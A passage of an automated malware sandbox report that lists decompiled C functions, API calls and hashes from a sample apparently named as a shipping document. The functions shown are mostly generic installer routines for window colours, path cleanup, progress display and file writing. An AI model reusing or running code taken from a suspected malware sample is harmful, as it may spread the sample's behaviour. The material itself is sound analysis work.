                                                  • Part of subcall function 6EAC12BB: GlobalAlloc.KERNELBASE(00000040,?,6EAC12DB,?,6EAC137F,00000019,6EAC11CA,-000000A0), ref: 6EAC12C5
                                                • GlobalFree.KERNEL32 ref: 6EAC2743
                                                • GlobalFree.KERNEL32 ref: 6EAC2778
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.520623463.000000006EAC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6EAC0000, based on PE: true
                                                • Associated: 00000000.00000002.520610261.000000006EAC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.520638610.000000006EAC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.520646374.000000006EAC6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6eac0000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloc
                                                • String ID: {'t@u't
                                                • API String ID: 1780285237-541310889
                                                • Opcode ID: 207d31844b03c4ff6e1b2e1edd4cc61daef7b6efb8d0acdaa7235444fb57c6cb
                                                • Instruction ID: 8ad74e6b4897d286086f560965f20cd19ea74561c2be0658c6ecaa9358d1d54d
                                                • Opcode Fuzzy Hash: 207d31844b03c4ff6e1b2e1edd4cc61daef7b6efb8d0acdaa7235444fb57c6cb
                                                • Instruction Fuzzy Hash: DE31E235604A01DFCB158F94CAC8C6A7BBAFF87B043259529F101AB610CB349CC68B7B
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004044CA Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E004044CA(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                                                0x004044dc
                                                0x00404592
                                                0x00000000
                                                0x00404592
                                                0x004044ed
                                                0x004044f1
                                                0x00000000
                                                0x0040450b
                                                0x0040450b
                                                0x00404514
                                                0x00000000
                                                0x00000000
                                                0x00404516
                                                0x00404522
                                                0x00404525
                                                0x00404525
                                                0x0040452b
                                                0x00404531
                                                0x00404531
                                                0x0040453d
                                                0x00404543
                                                0x0040454a
                                                0x0040454d
                                                0x00404550
                                                0x00404552
                                                0x00404552
                                                0x0040455a
                                                0x00404560
                                                0x00404560
                                                0x0040456a
                                                0x0040456f
                                                0x00404572
                                                0x00404577
                                                0x0040457a
                                                0x0040457a
                                                0x0040458a
                                                0x0040458a
                                                0x00000000
                                                0x0040458d

                                                APIs
                                                • GetWindowLongW.USER32(?,000000EB), ref: 004044E7
                                                • GetSysColor.USER32(00000000), ref: 00404525
                                                • SetTextColor.GDI32(?,00000000), ref: 00404531
                                                • SetBkMode.GDI32(?,?), ref: 0040453D
                                                • GetSysColor.USER32(?), ref: 00404550
                                                • SetBkColor.GDI32(?,?), ref: 00404560
                                                • DeleteObject.GDI32(?), ref: 0040457A
                                                • CreateBrushIndirect.GDI32(?), ref: 00404584
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                • String ID:
                                                • API String ID: 2320649405-0
                                                • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                • Instruction ID: 38e33b6b7dbb33234eb72a45dbf2bae34717d2ad5d3f2d744b20a042554d00e7
                                                • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                • Instruction Fuzzy Hash: 072133B1500704BBCB319F68DD08B5BBBF8AF45714F04896EEB96A26E1D734E904CB58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 6EAC2480 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135memoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 85%
                                                			E6EAC2480(void* __edx) {
				void* _t37;
				signed int _t38;
				void* _t39;
				void* _t41;
				signed char* _t42;
				signed char* _t51;
				void* _t52;
				void* _t54;

				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
				while(1) {
					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
					_t52 = _t51[0x18];
					if(_t52 == 0) {
						goto L9;
					}
					_t41 = 0x1a;
					if(_t52 == _t41) {
						goto L9;
					}
					if(_t52 != 0xffffffff) {
						if(_t52 <= 0 || _t52 > 0x19) {
							_t51[0x18] = _t41;
							goto L12;
						} else {
							_t37 = E6EAC135A(_t52 - 1);
							L10:
							goto L11;
						}
					} else {
						_t37 = E6EAC12E3();
						L11:
						_t52 = _t37;
						L12:
						_t13 =  &(_t51[8]); // 0x1020
						_t42 = _t13;
						if(_t51[4] >= 0) {
						}
						_t38 =  *_t51 & 0x000000ff;
						_t51[0x1c] = 0;
						if(_t38 > 7) {
							L27:
							_t39 = GlobalFree(_t52);
							if( *(_t54 + 0x10) == 0) {
								return _t39;
							}
							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
							} else {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t38 * 4 +  &M6EAC25F8))) {
								case 0:
									 *_t42 = 0;
									goto L27;
								case 1:
									__eax = E6EAC13B1(__ebp);
									goto L21;
								case 2:
									 *__edi = E6EAC13B1(__ebp);
									__edi[1] = __edx;
									goto L27;
								case 3:
									__eax = GlobalAlloc(0x40,  *0x6eac506c);
									 *(__esi + 0x1c) = __eax;
									__edx = 0;
									 *__edi = __eax;
									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x6eac506c, __eax,  *0x6eac506c, 0, 0);
									goto L27;
								case 4:
									__eax = E6EAC12CC(__ebp);
									 *(__esi + 0x1c) = __eax;
									L21:
									 *__edi = __eax;
									goto L27;
								case 5:
									__eax = GlobalAlloc(0x40, 0x10);
									_push(__eax);
									 *(__esi + 0x1c) = __eax;
									_push(__ebp);
									 *__edi = __eax;
									__imp__CLSIDFromString();
									goto L27;
								case 6:
									if( *__ebp != __cx) {
										__eax = E6EAC13B1(__ebp);
										 *__ebx = __eax;
									}
									goto L27;
								case 7:
									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
									( *(__esi + 0x18) - 1) *  *0x6eac506c =  *0x6eac5074 + ( *(__esi + 0x18) - 1) *  *0x6eac506c * 2 + 0x18;
									 *__ebx =  *0x6eac5074 + ( *(__esi + 0x18) - 1) *  *0x6eac506c * 2 + 0x18;
									asm("cdq");
									__eax = E6EAC1510(__edx,  *0x6eac5074 + ( *(__esi + 0x18) - 1) *  *0x6eac506c * 2 + 0x18, __edx,  *0x6eac5074 + ( *(__esi + 0x18) - 1) *  *0x6eac506c * 2);
									goto L27;
							}
						}
					}
					L9:
					_t37 = E6EAC12CC(0x6eac5044);
					goto L10;
				}
			}











                                                0x6eac2494
                                                0x6eac2498
                                                0x6eac24a3
                                                0x6eac24a3
                                                0x6eac24aa
                                                0x6eac24af
                                                0x00000000
                                                0x00000000
                                                0x6eac24b3
                                                0x6eac24b6
                                                0x00000000
                                                0x00000000
                                                0x6eac24bb
                                                0x6eac24c6
                                                0x6eac24d6
                                                0x00000000
                                                0x6eac24cd
                                                0x6eac24cf
                                                0x6eac24e5
                                                0x00000000
                                                0x6eac24e5
                                                0x6eac24bd
                                                0x6eac24bd
                                                0x6eac24e6
                                                0x6eac24e6
                                                0x6eac24e8
                                                0x6eac24ec
                                                0x6eac24ec
                                                0x6eac24ef
                                                0x6eac24ef
                                                0x6eac24f7
                                                0x6eac24ff
                                                0x6eac2502
                                                0x6eac25c1
                                                0x6eac25c2
                                                0x6eac25cd
                                                0x6eac25f7
                                                0x6eac25f7
                                                0x6eac25dd
                                                0x6eac25e9
                                                0x6eac25df
                                                0x6eac25df
                                                0x6eac25df
                                                0x00000000
                                                0x6eac2508
                                                0x6eac2508
                                                0x00000000
                                                0x6eac250f
                                                0x00000000
                                                0x00000000
                                                0x6eac2517
                                                0x00000000
                                                0x00000000
                                                0x6eac2525
                                                0x6eac2527
                                                0x00000000
                                                0x00000000
                                                0x6eac2548
                                                0x6eac254e
                                                0x6eac2551
                                                0x6eac2553
                                                0x6eac2563
                                                0x00000000
                                                0x00000000
                                                0x6eac2530
                                                0x6eac2535
                                                0x6eac2538
                                                0x6eac2539
                                                0x00000000
                                                0x00000000
                                                0x6eac256f
                                                0x6eac2575
                                                0x6eac2576
                                                0x6eac2579
                                                0x6eac257a
                                                0x6eac257c
                                                0x00000000
                                                0x00000000
                                                0x6eac2588
                                                0x6eac258b
                                                0x6eac2597
                                                0x6eac2599
                                                0x00000000
                                                0x00000000
                                                0x6eac25a5
                                                0x6eac25b1
                                                0x6eac25b4
                                                0x6eac25b6
                                                0x6eac25b9
                                                0x00000000
                                                0x00000000
                                                0x6eac2508
                                                0x6eac2502
                                                0x6eac24db
                                                0x6eac24e0
                                                0x00000000
                                                0x6eac24e0

                                                APIs
                                                • GlobalFree.KERNEL32 ref: 6EAC25C2
                                                  • Part of subcall function 6EAC12CC: lstrcpynW.KERNEL32(00000000,?,6EAC137F,00000019,6EAC11CA,-000000A0), ref: 6EAC12DC
                                                • GlobalAlloc.KERNEL32(00000040), ref: 6EAC2548
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6EAC2563
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.520623463.000000006EAC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6EAC0000, based on PE: true
                                                • Associated: 00000000.00000002.520610261.000000006EAC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.520638610.000000006EAC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.520646374.000000006EAC6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6eac0000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                • String ID: @u't
                                                • API String ID: 4216380887-1707551450
                                                • Opcode ID: 08312ebba60e2d51165901d6342135e036629c12f1b27388f55d513a41b2f25f
                                                • Instruction ID: c05e3fcdd74ada071a052face9ba62b008846a2dcd91720e0c8c5510e3e3e170
                                                • Opcode Fuzzy Hash: 08312ebba60e2d51165901d6342135e036629c12f1b27388f55d513a41b2f25f
                                                • Instruction Fuzzy Hash: D041E4B0148B09DFD714DFA9D954A6677B8FB99B04F10981DE405CB240E73498C6CB7B
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040678E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 91%
                                                			E0040678E(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405E4D(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405E03(L"*?|<>/\":", _t5))) == 0) {
							E00405FB2(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                0x00406790
                                                0x00406799
                                                0x004067b0
                                                0x004067b0
                                                0x004067b7
                                                0x004067c3
                                                0x004067c3
                                                0x004067c6
                                                0x004067c9
                                                0x004067ce
                                                0x004067d0
                                                0x004067d9
                                                0x004067dd
                                                0x004067fa
                                                0x00406802
                                                0x00406802
                                                0x00406807
                                                0x00406809
                                                0x0040680c
                                                0x00406811
                                                0x00406812
                                                0x00406816
                                                0x00406816
                                                0x00406817
                                                0x0040681e
                                                0x00406820
                                                0x00406827
                                                0x00000000
                                                0x00000000
                                                0x0040682f
                                                0x00406835
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406835
                                                0x0040683a

                                                APIs
                                                • CharNextW.USER32(?,*?|<>/":,00000000,00000000,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 004067F1
                                                • CharNextW.USER32(?,?,?,00000000,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406800
                                                • CharNextW.USER32(?,00000000,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406805
                                                • CharPrevW.USER32(?,?,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406818
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: Char$Next$Prev
                                                • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 589700163-2982765560
                                                • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                • Instruction ID: 0f69a0116b7f1ba106e871a719c63b07a343e19011b313dcb24ddb0bfcf4baff
                                                • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                • Instruction Fuzzy Hash: CE11862A80161299D7303B149D40A7762FCEF98764F56843FE986732C0E77C4CD286BD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00404E1E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00404E1E(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                0x00404e2c
                                                0x00404e39
                                                0x00404e3f
                                                0x00404e7d
                                                0x00404e7d
                                                0x00404e8c
                                                0x00404e93
                                                0x00000000
                                                0x00404e95
                                                0x00404e41
                                                0x00404e50
                                                0x00404e58
                                                0x00404e5b
                                                0x00404e6d
                                                0x00404e73
                                                0x00404e7a
                                                0x00000000
                                                0x00404e7a
                                                0x00000000

                                                APIs
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E39
                                                • GetMessagePos.USER32 ref: 00404E41
                                                • ScreenToClient.USER32 ref: 00404E5B
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404E6D
                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404E93
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: Message$Send$ClientScreen
                                                • String ID: f
                                                • API String ID: 41195575-1993550816
                                                • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                • Instruction ID: 39da0b83e90955b658913b401ee9b713f1841a36fe6a8bad0240d4c742fa7cb5
                                                • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                • Instruction Fuzzy Hash: E9018C72A0021DBADB00DBA4CD81FFEBBB8AF55710F10002BBA51B61C0C7B49A018BA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00402F93 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x414eb8; // 0x52fa6
					_t11 =  *0x420ec4; // 0x536c0
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}






                                                0x00402fa3
                                                0x00402fb1
                                                0x00402fb7
                                                0x00402fb7
                                                0x00402fc5
                                                0x00402fc7
                                                0x00402fcd
                                                0x00402fd4
                                                0x00402fd6
                                                0x00402fd6
                                                0x00402fec
                                                0x00402ffc
                                                0x0040300e
                                                0x0040300e
                                                0x00403016

                                                APIs
                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                • MulDiv.KERNEL32(00052FA6,00000064,000536C0), ref: 00402FDC
                                                • wsprintfW.USER32 ref: 00402FEC
                                                • SetWindowTextW.USER32(?,?), ref: 00402FFC
                                                • SetDlgItemTextW.USER32 ref: 0040300E
                                                Strings
                                                • verifying installer: %d%%, xrefs: 00402FE6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: Text$ItemTimerWindowwsprintf
                                                • String ID: verifying installer: %d%%
                                                • API String ID: 1451636040-82062127
                                                • Opcode ID: b8c438f2cb2d4d4e81e5e052a7d6c8fe5fe1304565937caf9c710faa28001cd8
                                                • Instruction ID: 6e758109fa8cded6d2ea51641b68a6ee4e1df044416b280c1a6c4c5bd582b841
                                                • Opcode Fuzzy Hash: b8c438f2cb2d4d4e81e5e052a7d6c8fe5fe1304565937caf9c710faa28001cd8
                                                • Instruction Fuzzy Hash: B1014F7164020DABEF609F60DE4ABEA3B69FB00345F008039FA06B51D1DBB999559F58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 86%
                                                			E00402950(int __ebx, void* __eflags) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				int _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405E4D(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00405FD2(_t55);
				_t29 = E00405FF7(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x42a234;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004034AF(_t49);
							E00403499(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E004032B4( *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00405FB2( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E004060A9( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E004032B4( *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}













                                                0x00402950
                                                0x00402952
                                                0x00402957
                                                0x0040295c
                                                0x0040295f
                                                0x00402969
                                                0x0040296d
                                                0x0040296d
                                                0x00402973
                                                0x00402980
                                                0x00402988
                                                0x0040298b
                                                0x00402997
                                                0x0040299a
                                                0x004029a0
                                                0x004029ae
                                                0x004029b3
                                                0x004029b7
                                                0x004029ba
                                                0x004029c3
                                                0x004029cf
                                                0x004029d3
                                                0x004029d6
                                                0x004029e0
                                                0x004029ff
                                                0x004029ec
                                                0x004029f4
                                                0x004029f7
                                                0x004029fc
                                                0x004029fc
                                                0x00402a06
                                                0x00402a06
                                                0x00402a13
                                                0x00402a19
                                                0x00402a1f
                                                0x00402a1f
                                                0x004029b7
                                                0x00402a33
                                                0x00402a35
                                                0x00402a35
                                                0x00402a3f
                                                0x00402a40
                                                0x00402a44
                                                0x00402a48
                                                0x00402a4e
                                                0x00402a4e
                                                0x00402a55
                                                0x004022f1
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                • GlobalFree.KERNEL32 ref: 00402A06
                                                • GlobalFree.KERNEL32 ref: 00402A19
                                                • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
